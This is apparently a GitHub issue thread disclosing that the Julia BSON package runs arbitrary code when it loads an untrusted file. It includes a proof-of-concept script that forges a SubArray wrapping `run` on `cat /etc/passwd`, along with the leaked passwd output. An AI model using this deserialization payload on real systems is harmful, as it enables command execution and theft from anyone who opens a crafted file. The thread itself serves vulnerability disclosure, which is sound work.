Closed chethega closed 4 years ago
Without risking me compromising your machine:

```julia
julia> using BSON

julia> # local struct with the same name and field layout as Base.SubArray
       struct SubArray{T,N,P,I,L} <: AbstractArray{T,N}
           parent
           indices
           offset1
           stride1
       end

julia> # lazy broadcast of `run` over a Cmd; nothing executes until getindex
       br = Base.Broadcast.Broadcasted(run, ([`cat /etc/passwd`],));

julia> v = SubArray{Any,1,Any,Tuple{Array{Int64,1}},false}(br, ([1],), 0, 0);

julia> w = SubArray{Any,1,Any,Tuple{Array{Int64,1}},false}(1:5, (v,), 0, 0);

julia> BSON.bson("poc.bson", a=w);
```
Then start a new julia session:

```julia
julia> using BSON

julia> BSON.load("poc.bson");
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
[...]
ERROR: MethodError: Cannot `convert` an object of type Base.Process to an object of type Int64
```
Just wondering: is this actually due to the BSON loading process, or due to the `show` method invoked by the REPL?
I figured the BSON loading could probably be made secure (though obviously that's pretty moot for most users if any practical usage of that data is unsafe).
It is actually the loading. Note the `;` at the end.
We had some discussion on slack that loading of adversarial BSON files is insecure by design and intention. Hence, this is not really a security issue, and requires no responsible disclosure. However, I think we could document this better, and maybe keep this issue open as a catch-all discussion thread for security aspects of BSON.jl.

On slack, @oxinabox asked for a PoC. Find a PoC attached (expected behavior: `parse` should work without issue and allow you to inspect the file; `load` runs `cat /etc/passwd` before erroring out; you might consider using a VM for that). Code execution is obtained by triggering a `convert` of a `SubArray`, which in turn triggers a `getindex` on a ``Base.Broadcast.Broadcasted(run, ([`cat /etc/passwd`],))``.

poc.bson.zip